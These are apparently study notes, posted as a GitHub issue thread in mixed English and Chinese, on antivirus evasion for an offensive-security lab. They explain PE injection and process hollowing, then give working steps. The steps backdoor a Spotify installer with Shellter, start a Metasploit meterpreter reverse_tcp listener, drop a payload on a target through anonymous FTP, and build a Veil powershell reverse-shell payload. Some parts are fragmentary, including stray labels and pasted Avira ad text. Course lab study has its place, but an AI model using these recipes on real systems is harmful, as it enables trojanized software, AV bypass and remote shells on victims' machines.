WDavid404
commented
10 months ago - Antivirus Software Key Components and Operations
- Bypassing Antivirus Detections
- Antivirus Evasion in Practice
Open WDavid404 opened 10 months ago
WDavid404
commented
10 months ago WDavid404
commented
10 months ago VirusTotal is a malware search engine that allows users to search known malware or submit new samples and scan them against a number of AV products.
AVs signatures are written based on known threats
To overcome these AV limitations, Endpoint Detection and Response (EDR)5 solutions have evolved during recent years. EDR software is responsible for generating security-event telemetry and forwarding it to a Security Information and Event Management (SIEM)6 system, which collects data from every company host. These events are then rendered by the SIEM so that the security analyst team can gain a full overview of any past or ongoing attack affecting the organization.
A modern antivirus is typically designed around the following components:
WDavid404
commented
10 months ago Enigma Protector
portable executables (PE)
PE 的意思就是 Portable Executable (可移植的执行体)。它是 Windows 环境自身所带的执行体文件格式。
它的一些特性继承自 Unix 的 Coff (common object file format) 文件格式。
In-Memory Injections,1 also known as PE Injection.
One of the main benefits of this technique is that it does not write any files to disk, which is a commonly focused area for most antivirus products.
Remote Process Memory Injection, which attempts to inject the payload into another valid PE that is not malicious. The most common method of doing this is by leveraging a set of Windows APIs.
Reflective DLL Injection technique attempts to load a DLL stored by the attacker in the process memory. The main challenge of implementing this technique is that LoadLibrary does not support loading a DLL from memory. Furthermore, the Windows operating system does not expose any APIs that can handle this either. Attackers who choose to use this technique must write their own version of the API that does not rely on a disk-based DLL.
Process Hollowing: attackers first launch a non-malicious process in a suspended state. Once launched, the image of the process is removed from memory and replaced with a malicious executable image. Finally, the process is then resumed and malicious code is executed instead of the legitimate process.
Inline hooking: involves modifying memory and introducing a hook (an instruction that redirects the code execution) into a function to make it point to our malicious code. Upon executing our malicious code, the flow will return back to the modified function and resume execution, appearing as if only the original code had executed.
WDavid404
commented
10 months ago One of the main benefits of executing a script rather than a PE is that it is difficult for antivirus manufacturers to determine if the script is malicious as it's run inside an interpreter and the script itself isn't executable code. Nevertheless, please keep in mind that some AV products handle malicious script detection with more success than others.
Furthermore, even if the script is marked as malicious, it can easily be altered. Antivirus software will often review variable names, comments, and logic, all of which can be changed without the need to recompile anything.
Avira Free Security is one of the best free antivirus offerings on the market, but it lacks a lot of features that Avira's paid plans include, like unlimited VPN data and password manager data protection tools. Avira Free users don't get access to email or phone customer support, either.
In the script, renamed sc and winFunc to var1 and var2, respectively to bypass AV's detection.
原内容
修改后
To executing our script, we need to change the poweshell's policy at first: Retrieve the current execution policy via the Get-ExecutionPolicy -Scope CurrentUser command and then set it to Unrestricted via the Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser command.
PS C:\Users\offsec\Desktop> Get-ExecutionPolicy -Scope CurrentUser
Undefined
PS C:\Users\offsec\Desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help Module at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
PS C:\Users\offsec\Desktop> Get-ExecutionPolicy -Scope CurrentUser
UnrestrictedShellter is a dynamic shellcode injection tool and one of the most popular free tools capable of bypassing antivirus software. It uses a number of novel and advanced techniques to backdoor a valid and non-malicious executable file with a malicious shellcode payload.
Installation:
kali@kali:~$ apt-cache search shellter
shellter - Dynamic shellcode injection tool and dynamic PE infector
kali@kali:~$ sudo apt install shellter
...also install wine to run shellter on linux
kali@kali:~$ sudo apt install wine
...
root@kali:~# sudo dpkg --add-architecture i386 && sudo apt-get update &&
sudo apt-get install wine32-->dpkg command tells the package manager to add support for 32-bit x86 architecture which is required if you want to install 32-bit applications and the second command is installing the wine package.
Once everything is installed, running the shellter command in the local Kali terminal。
To start, we'll need to tell Shellter the Spotify installer location on our local Kali machine. In this case, it is /home/kali/desktop/spotifysetup.exe. Before analyzing and altering the original PE in any way, Shellter will first create a backup of the file.
Kali 执行下面command用于接收上面Spotify.exe文件在运行时发送来的reverse shell
kali@kali:~$ msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.50.1;set LPORT 443;run;"
在目标windows PC上运行注入过的Spotify.exe时,Kali动作如下
Note: 当运行shellter命令遇到下面error时
└─$ shellter
wine: could not load kernel32.dll, status c0000135执行下面命令,然后再重新run shellter
mv ~/.wine ~/.wine.old
运行成功时如下图(尽管也有err msg出现)
WDavid404
commented
8 months ago Target IP: 192.168.186.53
nmap -sV -T4
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 10.0--> I cannot access web page on web broswer
Try to login FTP with anonymous --> Succeed
ftp operation
ftp> prompt
Interactive mode off.ftp> binary -> enable binary encoding while transferring the file 200 Type set to I.
ftp> put putty.exe
ftp> ls 200 EPRT command successful. 125 Data connection already open; Transfer starting. 03-08-24 01:21AM putty.exe 226 Transfer complete.
Meanwhile, prepare metasploit multi/hander on kali
`msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST<kali IP>;set LPORT 443;run;"`install Veil on Kali
sudo apt install veil-evasion
sudo veilNote: don't skip/cancel some installation such as python,ruby。。
run veil
sudo veilVeil > update --》 in order to increase success probability by updating to the latest
use 1 --》 To use evasion mode (1)
list --> To list up all payloads
use 22 --> 22) powershell/meterpreter/rev_tcp.py
set lhost 192.168.45.203 set lport 443 options
generate
---> input filename as 'test_veil', it will genearate a bat file
3. set the FTP session as active: ftp -A 192.168.193.53 .. (same as Q2)